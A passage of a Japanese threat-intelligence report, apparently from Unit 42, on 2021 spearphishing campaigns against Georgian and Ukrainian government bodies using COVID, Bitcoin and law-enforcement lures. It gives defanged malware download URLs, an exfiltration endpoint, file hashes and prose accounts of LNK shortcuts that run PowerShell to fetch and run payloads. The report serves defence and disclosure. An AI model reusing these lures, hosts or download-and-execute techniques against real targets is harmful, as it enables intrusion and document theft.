href=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2021\/04\/a-deep-dive-into-saint-bot-downloader\/\">MalwareBytes<\/a>\u306e\u8abf\u67fb\u306b\u3088\u308b\u3068\u3001\u3053\u306e\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u306f2021\u5e743\u6708\u3001Bitcoin\u3068\u65b0\u578b\u30b3\u30ed\u30ca\u30a6\u30a4\u30eb\u30b9\u611f\u67d3\u75c7(COVID)\u3092\u30c6\u30fc\u30de\u306b\u3057\u3066\u30b8\u30e7\u30fc\u30b8\u30a2\u306e\u6a19\u7684\u306b\u5bfe\u3059\u308b\u653b\u6483\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3092\u5b9f\u65bd\u3057\u307e\u3057\u305f\u3002\u30ea\u30b5\u30fc\u30c1\u30e3\u30fc\u306f\u3053\u308c\u3089\u306e\u653b\u6483\u306b\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u304c\u4f7f\u7528\u3055\u308c\u305f\u3068\u8ff0\u3079\u3066\u3044\u307e\u3059\u304c\u3001\u6a19\u7684\u7d44\u7e54\u3001\u653b\u6483\u30d9\u30af\u30c8\u30eb\u3001\u653b\u6483\u306e\u6b63\u78ba\u306a\u65e5\u6642\u3092\u78ba\u8a8d\u3059\u308b\u305f\u3081\u306e\u30c6\u30ec\u30e1\u30c8\u30ea\u30c7\u30fc\u30bf\u3092\u79c1\u305f\u3061\u306f\u3082\u3063\u3066\u3044\u307e\u305b\u3093\u3002Bitcoin\u3092\u30c6\u30fc\u30de\u306b\u3057\u305f\u4eca\u56de\u306e\u653b\u6483\u306f\u3001\u56f321\u306b\u793a\u3059\u3088\u3046\u306bPDF\u306e\u914d\u5e03\u6587\u66f8\u304cElectrum Bitcoin\u30a6\u30a9\u30ec\u30c3\u30c8\u3078\u8a00\u53ca\u3057\u3066\u3044\u308b\u306a\u3069\u985e\u4f3c\u3059\u308b\u30b3\u30f3\u30c6\u30f3\u30c4\u3092\u542b\u3093\u3067\u304a\u308a\u30014\u6708\u5f8c\u534a\u306e\u653b\u6483\u3067\u898b\u3089\u308c\u305f\u3082\u306e\u3068\u975e\u5e38\u306b\u3088\u304f\u4f3c\u3066\u3044\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_122118\" aria-describedby=\"caption-attachment-122118\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-122118 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2022\/02\/word-image-45.png\" alt=\"\u56f321a. 2021\u5e743\u6708\u306eBitcoin\u3092\u30c6\u30fc\u30de\u306b\u3057\u305f\u653b\u6483\u3067\u4f7f\u7528\u3055\u308c\u305fPDF\u6587\u66f8\u306e\u30b3\u30f3\u30c6\u30f3\u30c4\" width=\"900\" height=\"702\" \/><figcaption id=\"caption-attachment-122118\" class=\"wp-caption-text\">\u56f321a. 2021\u5e743\u6708\u306eBitcoin\u3092\u30c6\u30fc\u30de\u306b\u3057\u305f\u653b\u6483\u3067\u4f7f\u7528\u3055\u308c\u305fPDF\u6587\u66f8\u306e\u30b3\u30f3\u30c6\u30f3\u30c4<\/figcaption><\/figure>\n<figure id=\"attachment_122116\" aria-describedby=\"caption-attachment-122116\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-122116 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2022\/02\/word-image-44.png\" alt=\"2021\u5e744\u6708\u306bBitcoin\u3092\u30c6\u30fc\u30de\u306b\u3057\u305f\u653b\u6483\u3067\u4f7f\u7528\u3055\u308c\u305fPDF\u6587\u66f8\u306e\u30b3\u30f3\u30c6\u30f3\u30c4\" width=\"900\" height=\"530\" \/><figcaption id=\"caption-attachment-122116\" class=\"wp-caption-text\">\u56f321b. 2021\u5e744\u6708\u306eBitcoin\u3092\u30c6\u30fc\u30de\u306b\u3057\u305f\u653b\u6483\u3067\u4f7f\u7528\u3055\u308c\u305fPDF\u6587\u66f8\u306e\u30b3\u30f3\u30c6\u30f3\u30c4<\/figcaption><\/figure>\n<p>\u65b0\u578b\u30b3\u30ed\u30ca\u30a6\u30a4\u30eb\u30b9\u611f\u67d3\u75c7\u3092\u30c6\u30fc\u30de\u3068\u3057\u305f\u653b\u6483\u306b\u306f\u30b8\u30e7\u30fc\u30b8\u30a2\u653f\u5e9c\u7d44\u7e54\u3078\u306e\u8a00\u53ca\u304c\u542b\u307e\u308c\u3066\u3044\u308b\u3053\u3068\u304b\u3089\u3001\u3053\u306e\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u306f\u30a6\u30af\u30e9\u30a4\u30ca\u306b\u304f\u308f\u3048\u3066\u3053\u306e\u5730\u57df\u306b\u3042\u308b\u4ed6\u306e\u56fd\u306b\u3082\u95a2\u5fc3\u3092\u6301\u3063\u3066\u3044\u308b\u3053\u3068\u304c\u793a\u5506\u3055\u308c\u307e\u3059\u3002\u3053\u306e\u653b\u6483\u3067\u306f<span style=\"font-family: 'courier new', courier, monospace;\">bgicovid19[.]com\/assets\/img\/newCOVID-21.zip<\/span>\u306b\u30db\u30b9\u30c8\u3055\u308c\u3066\u3044\u305fZip\u30a2\u30fc\u30ab\u30a4\u30d6\u304c\u5229\u7528\u3055\u308c\u3066\u304a\u308a\u3001\u3053\u308c\u306b\u306f\u60aa\u610f\u306e\u3042\u308b\u30d5\u30a1\u30a4\u30eb\u304c2\u3064\u3001\u304a\u3068\u308a\u306e\u6587\u66f8\u304c1\u3064\u542b\u307e\u308c\u3066\u3044\u307e\u3059(\u88684\u53c2\u7167)\u3002<\/p>\n<table style=\"width: 100.86%;\">\n<tbody>\n<tr>\n<td style=\"width: 25.788%;\"><b>\u30d5\u30a1\u30a4\u30eb\u540d<\/b><\/td>\n<td style=\"width: 39.0401%;\"><b>SHA256<\/b><\/td>\n<td style=\"width: 35.3152%;\"><b>\u8aac\u660e<\/b><\/td>\n<\/tr>\n<tr>\n<td style=\"width: 25.788%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">!!!COVID-21.doc<\/span><\/td>\n<td style=\"width: 39.0401%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">4fcfe7718ea860ab5c6d19b27811f81683576e7bb60da3db85b4658230414b70<\/span><\/td>\n<td style=\"width: 35.3152%;\"><span style=\"font-weight: 400;\">CVE-2017-11882<\/span>\u3092\u60aa\u7528\u3057<span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">www.baiden00[.]ru\/win21st.txt<\/span>\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3059\u308b\u914d\u5e03\u6587\u66f8<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 25.788%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">New Folder.lnk<\/span><\/td>\n<td style=\"width: 39.0401%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">5d8c5bb9858fb51271d344eac586cff3f440c074254f165c23dd87b985b2110b<\/span><\/td>\n<td style=\"width: 35.3152%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">baiden00[.]ru\/wininst.exe<\/span>\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3059\u308bLNK\u30b7\u30e7\u30fc\u30c8\u30ab\u30c3\u30c8<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 25.788%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">letter from the Ministry of Labour, Health and Social Affairs of Georgia.pdf<\/span><\/td>\n<td style=\"width: 39.0401%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">49a758bfe34f1769a27b1a2da9f914bc956f7fdbb9e7a33534ca9e19d5f6168c<\/span><\/td>\n<td style=\"width: 35.3152%;\"><span style=\"font-weight: 400;\">\u304a\u3068\u308a\u6587\u66f8<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p style=\"text-align: center;\"><span style=\"color: #999999;\"><sup>\u88684 3\u6708\u306e\u653b\u6483\u3067\u4f7f\u308f\u308c\u305f\u914d\u5e03\u6587\u66f8<\/sup><\/span><\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">letter from the Ministry of Labour, Health and Social Affairs of Georgia.pdf<\/span>\u6587\u66f8\u306f\u60aa\u610f\u306e\u3042\u308b\u30b3\u30f3\u30c6\u30f3\u30c4\u3092\u542b\u3093\u3067\u3044\u306a\u3044\u306e\u3067\u304a\u3068\u308a\u6587\u66f8\u3067\u3059\u3002\u56f322\u306b\u793a\u3059\u3088\u3046\u306b\u3001\u304a\u3068\u308a\u306e\u30b3\u30f3\u30c6\u30f3\u30c4\u306b\u306f\u30b8\u30e7\u30fc\u30b8\u30a2\u52b4\u50cd\u4fdd\u5065\u793e\u4f1a\u7701\u306e\u6587\u66f8\u304c\u8868\u793a\u3055\u308c\u308b\u3053\u3068\u304b\u3089\u3001\u30b8\u30e7\u30fc\u30b8\u30a2\u306b\u3042\u308b\u7d44\u7e54\u304c\u6a19\u7684\u3068\u306a\u3063\u3066\u3044\u305f\u53ef\u80fd\u6027\u304c\u793a\u5506\u3055\u308c\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_122119\" aria-describedby=\"caption-attachment-122119\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-122120 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2022\/02\/word-image-46.png\" alt=\"2021\u5e743\u6708\u306b\u884c\u308f\u308c\u305f\u3068\u898b\u3089\u308c\u308b\u653b\u6483\u3067\u306e\u304a\u3068\u308a\u6587\u66f8\u306e\u30b3\u30f3\u30c6\u30f3\u30c4\" width=\"900\" height=\"440\" \/><figcaption id=\"caption-attachment-122119\" class=\"wp-caption-text\">\u56f322. 2021\u5e743\u6708\u306b\u884c\u308f\u308c\u305f\u3068\u898b\u3089\u308c\u308b\u653b\u6483\u3067\u306e\u304a\u3068\u308a\u6587\u66f8\u306e\u30b3\u30f3\u30c6\u30f3\u30c4<\/figcaption><\/figure>\n<h3><a id=\"april-2021-attacks\"><\/a>2021\u5e744\u6708\u306e\u653b\u6483<\/h3>\n<p>2021\u5e744\u6708\u3001\u3053\u306e\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u306f\u3001\u300cBitcoin\u3092\u53d7\u3051\u53d6\u308c\u3070\u53d7\u4fe1\u8005\u306f\u91d1\u6301\u3061\u306b\u306a\u308c\u308b\u300d\u3068\u3059\u308bPDF\u6587\u66f8\u3092\u6dfb\u4ed8\u3057\u305f\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u30e1\u30fc\u30eb\u306b\u3088\u308b\u653b\u6483\u3092\u5b9f\u65bd\u3057\u307e\u3057\u305f(\u56f323\u53c2\u7167)\u3002<a href=\"https:\/\/asec.ahnlab.com\/en\/22481\/\">Ahnlab<\/a>\u306e\u8abf\u67fb\u3067\u6700\u521d\u306b\u660e\u3089\u304b\u306b\u306a\u3063\u305f\u3053\u308c\u3089Bitcoin\u3092\u30c6\u30fc\u30de\u306b\u3057\u305f\u653b\u6483\u306f\u3001\u3068\u304f\u306b\u30a6\u30af\u30e9\u30a4\u30ca\u306e\u653f\u5e9c\u7d44\u7e54\u3092\u6a19\u7684\u306b\u3057\u3066\u3044\u307e\u3057\u305f\u3002<\/p>\n<figure id=\"attachment_122121\" aria-describedby=\"caption-attachment-122121\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-122122 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2022\/02\/word-image-47.png\" alt=\"Bitcoin\u3092\u30c6\u30fc\u30de\u306b\u3057\u305f\u653b\u6483\u306b\u4f7f\u308f\u308c\u305fPDF\u6587\u66f8\u306e\u30b3\u30f3\u30c6\u30f3\u30c4\" width=\"900\" height=\"526\" \/><figcaption id=\"caption-attachment-122121\" class=\"wp-caption-text\">\u56f323. Bitcoin\u3092\u30c6\u30fc\u30de\u306b\u3057\u305f\u653b\u6483\u306b\u4f7f\u308f\u308c\u305fPDF\u6587\u66f8\u306e\u30b3\u30f3\u30c6\u30f3\u30c4<\/figcaption><\/figure>\n<p>\u914d\u5e03\u30e1\u30fc\u30eb\u306b\u6dfb\u4ed8\u3055\u308c\u305fPDF\u6587\u66f8\u306b\u306f\u3001\u5927\u91d1\u5165\u308aBitcoin\u30a6\u30a9\u30ec\u30c3\u30c8\u306b\u30a2\u30af\u30bb\u30b9\u3067\u304d\u308b\u3053\u3068\u3092\u793a\u5506\u3059\u308b\u6587\u7ae0\u3068\u3001\u305d\u306e\u30a6\u30a9\u30ec\u30c3\u30c8\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3059\u308b\u305f\u3081\u306e\u30ea\u30f3\u30af\u304c\u8a18\u8f09\u3055\u308c\u3066\u3044\u307e\u3059(\u56f324\u53c2\u7167)\u3002\u3053\u306e\u30ea\u30f3\u30af<span style=\"font-family: 'courier new', courier, monospace;\">cutt[.]ly\/McXG1ft<\/span>\u306f\u77ed\u7e2e\u3055\u308c\u3066\u304a\u308a\u3001Zip\u30a2\u30fc\u30ab\u30a4\u30d6\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3059\u308bURL <span style=\"font-family: 'courier new', courier, monospace;\">http:\/\/1924[.]site\/doc\/bitcoin.zip<\/span>\u306b\u5411\u3051\u3089\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_122123\" aria-describedby=\"caption-attachment-122123\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-122124 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2022\/02\/word-image-48.png\" alt=\"Bitcoin\u3092\u30c6\u30fc\u30de\u306b\u3057\u305f\u653b\u6483\u306b\u4f7f\u308f\u308c\u305fPDF\u6587\u66f8\u306e\u30b3\u30f3\u30c6\u30f3\u30c4\" width=\"900\" height=\"577\" \/><figcaption id=\"caption-attachment-122123\" class=\"wp-caption-text\">\u56f324. Bitcoin\u3092\u30c6\u30fc\u30de\u306b\u3057\u305f\u653b\u6483\u306b\u4f7f\u308f\u308c\u305fPDF\u6587\u66f8\u306e\u30b3\u30f3\u30c6\u30f3\u30c4<\/figcaption><\/figure>\n<p>Zip \u30a2\u30fc\u30ab\u30a4\u30d6\u306b\u306f LNK \u30b7\u30e7\u30fc\u30c8\u30ab\u30c3\u30c8\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u3053\u306eLINK\u30b7\u30e7\u30fc\u30c8\u30ab\u30c3\u30c8\u304cpowershell \u30b9\u30af\u30ea\u30d7\u30c8\u3092\u5b9f\u884c\u3057\u3001<span style=\"font-family: 'courier new', courier, monospace;\">hxxp:\/\/1924[.]site\/soft\/09042021.exe<\/span>\u304b\u3089\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u30fb\u5b9f\u884c\u3057\u307e\u3059\u3002\u307e\u305f\u3053\u306e\u30a2\u30fc\u30ab\u30a4\u30d6\u306b\u306f\u30012022\u5e742\u67081\u65e5\u306e\u30a6\u30af\u30e9\u30a4\u30ca\u306b\u5bfe\u3059\u308b\u653b\u6483\u3078\u518d\u5ea6\u30ea\u30f3\u30af\u3059\u308bElectrum Bitcoin\u30a6\u30a9\u30ec\u30c3\u30c8\u3092\u542b\u3080\u4ee5\u4e0b\u306e\u5185\u5bb9\u306e<span style=\"font-family: 'courier new', courier, monospace;\">password.txt<\/span>\u30d5\u30a1\u30a4\u30eb\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">Wallet in folder.<br \/>\n<\/span><span style=\"font-family: 'courier new', courier, monospace;\">Electrum: https:\/\/electrum.org<br \/>\n<\/span><span style=\"font-family: 'courier new', courier, monospace;\">Password for walletr is: btc1000000000usd<\/span><\/p>\n<p><a href=\"https:\/\/www.fortinet.com\/blog\/threat-research\/spearphishing-attack-uses-covid-21-lure-to-target-ukrainian-government\">Fortinet<\/a>\u306e\u8abf\u67fb\u306b\u3088\u308b\u3068\u30012021\u5e744\u6708\u3001\u3053\u306e\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u306f\u3001\u30a6\u30af\u30e9\u30a4\u30ca\u306e\u653f\u5e9c\u7d44\u7e54\u306b\u5bfe\u3057\u3001\u65b0\u578b\u30b3\u30ed\u30ca\u30a6\u30a4\u30eb\u30b9\u611f\u67d3\u75c7\u3092\u30c6\u30fc\u30de\u306b\u3057\u305f\u653b\u6483\u3082\u884c\u3063\u3066\u3044\u307e\u3059\u3002\u56f325\u306e\u30e1\u30fc\u30eb\u306b\u306f\u3001\u653f\u5e9c\u95a2\u4fc2\u8005\u3068\u4e16\u754c\u4fdd\u5065\u6a5f\u95a2(WHO)\u3068\u306e\u3084\u308a\u53d6\u308a\u3092\u88c5\u3063\u305f\u507d\u306e\u8ee2\u9001\u30e1\u30c3\u30bb\u30fc\u30b8\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u3053\u306e\u30e1\u30fc\u30eb\u306b\u306f\u3001\u6b63\u898f\u306ewho.int\u30c9\u30e1\u30a4\u30f3\u3067\u30db\u30b9\u30c8\u3055\u308c\u3066\u3044\u308bZip\u30a2\u30fc\u30ab\u30a4\u30d6\u3078\u306e\u30ea\u30f3\u30af\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u305f\u3060\u3057\u3053\u306e\u30ea\u30f3\u30af\u306f\u5b9f\u969b\u306b\u306f<span style=\"font-family: 'courier new', courier, monospace;\">hxxps:\/\/cutt[.]ly\/LcHx2Ga<\/span>\u3068\u3044\u3046\u77ed\u7e2e\u30ea\u30f3\u30af\u306b\u5411\u3051\u3089\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_122125\" aria-describedby=\"caption-attachment-122125\" style=\"width: 635px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-122126 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2022\/02\/word-image-49.png\" alt=\"\u65b0\u578b\u30b3\u30ed\u30ca\u30a6\u30a4\u30eb\u30b9\u611f\u67d3\u75c7\u3092\u30c6\u30fc\u30de\u3068\u3057\u305f\u653b\u6483\u306e\u914d\u5e03\u30e1\u30fc\u30eb\" width=\"635\" height=\"698\" \/><figcaption id=\"caption-attachment-122125\" class=\"wp-caption-text\">\u56f325. \u65b0\u578b\u30b3\u30ed\u30ca\u30a6\u30a4\u30eb\u30b9\u611f\u67d3\u75c7\u3092\u30c6\u30fc\u30de\u3068\u3057\u305f\u653b\u6483\u306e\u914d\u5e03\u30e1\u30fc\u30eb<\/figcaption><\/figure>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">hxxps:\/\/cutt[.]ly\/LcHx2Ga<\/span>\u3068\u3044\u3046URL\u306f<span style=\"font-family: 'courier new', courier, monospace;\">hxxp:\/\/2330[.]site\/NewCovid-21.zip<\/span>\u3092\u6307\u3057\u3066\u304a\u308a\u3001\u3042\u308bZip \u30a2\u30fc\u30ab\u30a4\u30d6 (SHA256:<span style=\"font-family: 'courier new', courier, monospace;\">677500881c64f4789025f46f3d0e853c00f2f41216eb2f2aaa1a6c59884b04cc<\/span>)\u304c\u30db\u30b9\u30c8\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u3053\u306eZip\u30a2\u30fc\u30ab\u30a4\u30d6\u306f\u4ee5\u4e0b\u306e\u30d5\u30a1\u30a4\u30eb\u3092\u542b\u3093\u3067\u3044\u307e\u3059\u3002<\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">COVID-21.doc<\/span>(SHA256:<span style=\"font-family: 'courier new', courier, monospace;\">9803e65afa5b8eef0b6f7ced42ebd15f979889b791b8eadfc98e7f102853451a<\/span>)<\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">COVID-21.lnk<\/span> (SHA256: <span style=\"font-family: 'courier new', courier, monospace;\">2b15ade9de6fb993149f27c802bb5bc95ad3fc1ca5f2e86622a044cf3541a70d<\/span>)<\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">GEO-CFUND-2009_CCM Agreement_Facesheet - signed.pdf<\/span> (SHA256: <span style=\"font-family: 'courier new', courier, monospace;\">bbab12dc486b1c6fcf9e343ec1474d0f8967de988444d7f838f1b4dcab343e8a<\/span>)<\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">New Folder.lnk<\/span> (SHA256: <span style=\"font-family: 'courier new', courier, monospace;\">2b15ade9de6fb993149f27c802bb5bc95ad3fc1ca5f2e86622a044cf3541a70d<\/span>)<\/p>\n<p>\u3053\u308c\u3089\u306eLNK\u30b7\u30e7\u30fc\u30c8\u30ab\u30c3\u30c8\u306f\u3042\u308bPowerShell\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u5b9f\u884c\u3057\u3088\u3046\u3068\u3057\u307e\u3059\u3002\u3053\u306ePowerShell\u304c\u3001\u4ee5\u4e0b\u306eURL\u304b\u3089\u5b9f\u884c\u30d5\u30a1\u30a4\u30eb\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u3001<span style=\"font-family: 'courier new', courier, monospace;\">%TEMP%\\WindowsUpdate.exe<\/span> \u306b\u4fdd\u5b58\u3057\u3066\u5b9f\u884c\u3057\u307e\u3059\u3002<\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">hxxp:\/\/2330[.]site\/soft\/08042021.exe<\/span><\/p>\n<p>\u3053\u306eLNK\u30b7\u30e7\u30fc\u30c8\u30ab\u30c3\u30c8\u306f<span style=\"font-family: 'courier new', courier, monospace;\">Start-BitsTransfer<\/span>\u30b3\u30de\u30f3\u30c9\u30ec\u30c3\u30c8\u3092\u4f7f\u3063\u3066\u4e0a\u8a18URL\u304b\u3089\u5b9f\u884c\u30d5\u30a1\u30a4\u30eb\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u307e\u3059\u3002\u3053\u306e\u624b\u6cd5\u306f\u3001\u5f8c\u8ff0\u306e2021\u5e747\u6708\u306e\u653b\u6483\u3067\u540c\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u304c\u30de\u30af\u30ed\u306b\u57cb\u3081\u8fbc\u3093\u3060\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u306b\u4f7f\u3063\u305f\u624b\u6cd5\u3068\u540c\u3058\u3082\u306e\u3067\u3059\u3002<\/p>\n<h3><a id=\"may-2021-attacks\"><\/a>2021\u5e745\u6708\u306e\u653b\u6483<\/h3>\n<p>2021\u5e745\u6708\u3001\u79c1\u305f\u3061\u306f\u3053\u306e\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u304c\u30a6\u30af\u30e9\u30a4\u30ca\u306e2\u3064\u306e\u653f\u5e9c\u6a5f\u95a2\u306b\u6a19\u7684\u578b\u30e1\u30fc\u30eb\u3092\u9001\u4fe1\u3057\u305f\u3053\u3068\u3092\u78ba\u8a8d\u3057\u307e\u3057\u305f\u30022\u901a\u306e\u30e1\u30fc\u30eb\u306e\u4ef6\u540d\u306f\u300c<span style=\"font-family: 'courier new', courier, monospace;\">\u0417\u0430\u044f\u0432\u0430 \u21164872823<\/span> \u300d\u3068\u300c<span style=\"font-family: 'courier new', courier, monospace;\">\u0417\u0430\u044f\u0432\u0430 \u2116487223\/2<\/span>\u300d\u3067\u3001\u3044\u305a\u308c\u306e\u30e1\u30c3\u30bb\u30fc\u30b8\u3082\u305d\u306e\u500b\u4eba\u306b\u4e0a\u5e2d\u7814\u7a76\u54e1\u304c\u9023\u7d61\u3057\u3088\u3046\u3068\u3057\u3066\u3044\u308b\u3053\u3068\u3092\u88c5\u3046\u540c\u4e00\u306e\u5185\u5bb9\u3067\u3057\u305f(\u56f326\u53c2\u7167)\u30022021\u5e745\u6708\u30686\u6708\u3001\u305d\u3057\u30662022\u5e742\u6708\u306b\u304b\u3051\u3066\u6cd5\u57f7\u884c\u6a5f\u95a2\u95a2\u9023\u306e\u30c6\u30fc\u30de\u304c\u4f7f\u7528\u3055\u308c\u3066\u3044\u308b\u3053\u3068\u304b\u3089\u3001\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u306f\u3001\u30c8\u30ec\u30f3\u30c9\u306b\u306a\u3063\u3066\u3044\u308b\u30c8\u30d4\u30c3\u30af\u3084\u6642\u4e8b\u554f\u984c\u304c\u306a\u3051\u308c\u3070\u3053\u306e\u30bd\u30fc\u30b7\u30e3\u30eb\u30a8\u30f3\u30b8\u30cb\u30a2\u30ea\u30f3\u30b0\u30c6\u30fc\u30de\u3092\u597d\u3093\u3067\u4f7f\u7528\u3057\u3066\u3044\u308b\u3053\u3068\u304c\u308f\u304b\u308a\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_122127\" aria-describedby=\"caption-attachment-122127\" style=\"width: 795px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-122128 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2022\/02\/word-image-50.png\" alt=\"2021\u5e745\u6708\u306b\u30a6\u30af\u30e9\u30a4\u30ca\u306e\u653f\u5e9c\u6a5f\u95a2\u306b\u9001\u3089\u308c\u305f\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u30e1\u30fc\u30eb\" width=\"795\" height=\"269\" \/><figcaption id=\"caption-attachment-122127\" class=\"wp-caption-text\">\u56f326. 2021\u5e745\u6708\u306b\u30a6\u30af\u30e9\u30a4\u30ca\u306e\u653f\u5e9c\u6a5f\u95a2\u306b\u9001\u3089\u308c\u305f\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u30e1\u30fc\u30eb<\/figcaption><\/figure>\n<p>\u3069\u3061\u3089\u306e\u914d\u5e03\u30e1\u30fc\u30eb\u306b\u3082\u540c\u3058\u6dfb\u4ed8\u30d5\u30a1\u30a4\u30eb\u304c\u3064\u3044\u3066\u3044\u307e\u3057\u305f\u3002\u5177\u4f53\u7684\u306b\u306f\u300c<span style=\"font-family: 'courier new', courier, monospace;\">\u0417\u0430\u044f\u0432\u0430 \u21164872823-(20).cpl<\/span>\u300d(SHA256: <span style=\"font-family: 'courier new', courier, monospace;\">f4a56c86e2903d509ede20609182fbe001b3a3ca05f8c23c597189935d4f71b8<\/span>) \u3068\u3044\u3046Windows\u30b3\u30f3\u30c8\u30ed\u30fc\u30eb\u30d1\u30cd\u30eb\u30d5\u30a1\u30a4\u30eb\u3067\u3001\u3053\u306e\u30d5\u30a1\u30a4\u30eb\u306f\u521d\u671f\u30c0\u30a6\u30f3\u30ed\u30fc\u30c0\u3068\u3057\u3066\u6a5f\u80fd\u3057\u3001\u305d\u3053\u304b\u3089\u4ee5\u4e0b\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u304c\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3055\u308c\u3001\u5b9f\u884c\u3055\u308c\u308b\u3088\u3046\u306b\u306a\u3063\u3066\u3044\u307e\u3059\u3002<\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">32689657[.]xyz\/putty5482.exe<\/span><\/p>\n<p>\u3053\u306e\u30b3\u30f3\u30c8\u30ed\u30fc\u30eb\u30d1\u30cd\u30eb\u30d5\u30a1\u30a4\u30eb\u306f\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u305f\u5b9f\u884c\u30d5\u30a1\u30a4\u30eb\u3092<span style=\"font-family: 'courier new', courier, monospace;\">%PUBLIC%\\puttys.exe<\/span> \u3068\u3057\u3066\u4fdd\u5b58\u3057\u3001<span style=\"font-family: 'courier new', courier, monospace;\">WinExec<\/span>\u6a5f\u80fd\u3092\u4f7f\u3063\u3066\u5b9f\u884c\u3057\u307e\u3059\u3002\u7d50\u679c\u306e\u5b9f\u884c\u30d5\u30a1\u30a4\u30eb(SHA256: <span style=\"font-family: 'courier new', courier, monospace;\">df3b1ad5445d628c24c1308aa6cb476bd9a06f0095a2b285927964339866b2c3<\/span>)\u306f\u6700\u7d42\u7684\u306bOutSteel\u30c9\u30ad\u30e5\u30e1\u30f3\u30c8\u30b9\u30c6\u30a3\u30fc\u30e9\u3092\u5b9f\u884c\u3057\u3001\u6b21\u306eURL\u306b\u30d5\u30a1\u30a4\u30eb\u3092\u6f0f\u51fa\u3057\u307e\u3059\u3002<\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">hxxp:\/\/194[.]147.142.232\/upld\/<\/span><\/p>\n<h3><a 